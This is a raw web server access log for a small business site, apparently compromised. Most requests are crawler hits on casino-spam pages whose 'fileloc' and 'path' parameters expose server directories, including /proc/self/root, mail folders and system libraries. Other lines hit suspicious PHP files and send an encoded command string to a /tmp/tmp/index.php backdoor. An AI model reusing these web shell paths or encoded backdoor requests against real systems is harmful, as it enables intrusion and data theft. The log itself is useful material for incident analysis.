216.73.216.11 - - [01/Nov/2025:08:48:30 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FGreaterThanOrEqual.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2842 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:30 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher%2FUrlMatcher.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher HTTP/1.1" 200 4577 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:30 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher%2FTraceableUrlMatcher.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher HTTP/1.1" 200 3892 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:30 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher%2FRedirectableUrlMatcher.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher HTTP/1.1" 200 3242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:30 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjavascript%2Fjson-ld.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjavascript HTTP/1.1" 200 3426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
69.197.179.242 - - [01/Nov/2025:08:48:31 -0400] "GET /wp-content/x072d63/index.php?id=893896 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-content/x072d63/index.php?id=893896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
216.73.216.11 - - [01/Nov/2025:08:48:30 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FComparator%2FComparator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FComparator HTTP/1.1" 200 3144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:30 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FLessThanOrEqual.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2840 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:31 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FDumper%2FDumper.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FDumper HTTP/1.1" 200 2879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.223 - - [01/Nov/2025:08:48:30 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-brotli/lib HTTP/1.1" 200 3273 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.203.68.145 - - [01/Nov/2025:08:48:32 -0400] "GET /beste-versorger-provision/?path=//opt/alt/ruby23/lib64/ruby/2.3.0/rinda HTTP/1.1" 200 3513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
40.77.167.123 - - [01/Nov/2025:08:48:32 -0400] "GET /items/1349953583.htm HTTP/1.1" 200 17 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:48:32 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FCount.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3119 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:32 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FComparator%2FDateComparator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FComparator HTTP/1.1" 200 3163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:48:32 -0400] "GET /q-~147SXJzhJjMQHFdIu8uVVDV6GFPefrefH19902/ HTTP/1.1" 200 4130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:48:32 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FDumper%2FGraphvizDumper.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FDumper HTTP/1.1" 200 5130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:32 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FBlank.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:34 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher%2FUrlMatcherInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FMatcher HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:33 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FExpression%2FGlob.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FExpression HTTP/1.1" 200 3508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:33 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FComparator%2FNumberComparator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FFinder%2FComparator HTTP/1.1" 200 3494 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:33 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FGreaterThan.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:35 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FIssn.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2850 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:36 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fcomponents%2Findex.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fcomponents HTTP/1.1" 200 2677 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:36 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FLessThanOrEqualValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:36 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FNotBlank.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:36 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FGreaterThanValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2877 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:48:36 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FIp.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.44.229.124 - - [01/Nov/2025:08:48:36 -0400] "GET /aventuras-brillantes-en-el-mundo-del-oscar-spin/?path=//home/creaqbdc/.cagefs/opt/alt/php74/link HTTP/1.1" 200 3384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:48:37 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FAnnotation%2FRoute.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FRouting%2FAnnotation HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:48:39 -0400] "GET /q-~131I0fum8dZMZtzweQiMFANjiwksuWPNY33846/ HTTP/1.1" 200 4147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:48:37 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FIbanValidator.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 3252 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.206.249.188 - - [01/Nov/2025:08:48:39 -0400] "GET /a-journey-through-timeless-realms-in-crash-x-game/?path=//home/creaqbdc/mail/creativefinishings.com/info HTTP/1.1" 200 4552 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:48:43 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-libicu HTTP/1.1" 200 2955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.209.100.30 - - [01/Nov/2025:08:48:43 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//lib/firmware/amdgpu/polaris11_me.bin&path=//lib/firmware/amdgpu HTTP/1.1" 200 2964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:48:44 -0400] "GET /q-~207cvxzYtAnRkKbIMI3oJQPr9RtVWM3OS1098/ HTTP/1.1" 200 4158 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
35.169.102.85 - - [01/Nov/2025:08:48:47 -0400] "GET /book-of-ra-magic-kostenlos-spielen-ohne-anmeldung/?path=//proc/sys/fs/binfmt_misc HTTP/1.1" 200 3439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
43.173.179.253 - - [01/Nov/2025:08:48:49 -0400] "GET /services/kitchen-wrapping/?fileloc=/home/creaqbdc/.caldav/.sharing&path=/home/creaqbdc/.caldav HTTP/1.1" 200 2951 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:48:49 -0400] "GET /q-~18H7IZeeEeZbIbp9nuqlsh0jJDkpwLCG26151/?fileloc=/home/creaqbdc/public_html/scx.php7&path=/home/creaqbdc/public_html HTTP/1.1" 200 5349 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:48:50 -0400] "GET /issues-on-online-gambling-australia/ HTTP/1.1" 200 19992 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:48:50 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~268KUPtQ7YlWQxxvJSy31jv58nWqt5NRJ23715/ HTTP/1.1" 200 19607 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:08:43:51 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343633312p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030313033312q6539383134623163323431623230353665336336353362353030656463386339222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
52.22.87.224 - - [01/Nov/2025:08:48:52 -0400] "GET /beste-versorger-provision/?path=//proc/self/root/usr/share/locale/nub/LC_MESSAGES HTTP/1.1" 200 3093 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:48:54 -0400] "GET /q-~230nXzi4osBtlvOWPColCnlRJDLL4wNom20967/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:48:54 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-brotli/bin HTTP/1.1" 200 2845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:48:56 -0400] "GET /q-~38SMd5jcbweNrkTIPI0rEfWBJZrP6Phm27291/?path=/home/creaqbdc/public_html/wp-includes/IXR HTTP/1.1" 200 19430 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.65.197 - - [01/Nov/2025:08:48:56 -0400] "GET /casino-sites-fast-withdrawal/ HTTP/1.1" 200 18662 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
3.93.211.16 - - [01/Nov/2025:08:48:56 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//lib64/libelf.so.1&path=//lib64 HTTP/1.1" 200 2935 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.194.14.255 - - [01/Nov/2025:08:48:59 -0400] "GET /holiday-home-transformation-at-tiara-residence-palm-jumeirah/?path=//opt/cloudlinux/venv/lib/python3.11/site-packages/numpy/linalg HTTP/1.1" 200 3981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:49:00 -0400] "GET /q-~48VnoV1gVtoYkUBCyXcuxLqqheSaR87y35525/ HTTP/1.1" 200 4111 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:49:01 -0400] "GET /?path=//proc/self/root/proc/2966092/root/etc/ld.so.conf.d HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.199 - - [01/Nov/2025:08:49:02 -0400] "GET /best-casino-bonuses-120-free-spins/ HTTP/1.1" 200 19752 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:08:49:04 -0400] "GET /q-~260mtNEUnkj3zKFvahgtATvLI2fPdaQQG15353/ HTTP/1.1" 200 4147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.6.5.24 - - [01/Nov/2025:08:49:04 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?path=//usr/libexec/awk HTTP/1.1" 200 3399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
194.5.82.19 - - [01/Nov/2025:08:49:07 -0400] "GET /wp-content/radio.php HTTP/1.1" 200 5263 "http://creativefinishings.com/wp-content/radio.php" "Go-http-client/2.0"
69.197.179.242 - - [01/Nov/2025:08:49:06 -0400] "GET /wp-includes/plf56b4b/edit.php?id=836336 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-includes/plf56b4b/edit.php?id=836336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.223 - - [01/Nov/2025:08:49:08 -0400] "GET /?path=//proc/self/root/proc/2966092/root/etc/modulefiles HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.198 - - [01/Nov/2025:08:49:07 -0400] "GET /free-casino-signup-bonus-no-deposit-required/ HTTP/1.1" 200 20069 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:08:49:08 -0400] "GET /q-~56TDDy9dBpbrjRGstbbLVYmu8ldnQ6NU27341/ HTTP/1.1" 200 4145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.235.125.129 - - [01/Nov/2025:08:49:08 -0400] "GET /beste-versorger-provision/?fileloc=//lib64/libIlmImf-2_2.so.22.0.0&path=//lib64 HTTP/1.1" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.198 - - [01/Nov/2025:08:49:09 -0400] "GET /q-~38SMd5jcbweNrkTIPI0rEfWBJZrP6Phm27291/?path=/home/creaqbdc/public_html/wp-includes/block-patterns HTTP/1.1" 200 3058 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
199.188.200.18 - - [01/Nov/2025:08:44:11 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343635312p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030313035312q6365366430653362653935363561303133326335633533663337623236306362222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:49:11 -0400] "GET /q-~239RFcofuWn0Adkbx45UfKJQZiTYzAhsr9906/ HTTP/1.1" 200 4149 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:49:13 -0400] "GET /play-online-united-kingdom-roulette-free/ HTTP/1.1" 200 19658 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.73.142.41 - - [01/Nov/2025:08:49:13 -0400] "GET /?path=//usr/lib/firmware/arm HTTP/1.1" 200 3323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:49:14 -0400] "GET /m095018539?srsltid=AfmBOoKAIeZPsLRDr9Mlfa_UoT19qbNGs_uDQq7HwR-W-3mWKT8rsE HTTP/1.1" 200 19057 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:08:49:14 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-openssl/include HTTP/1.1" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
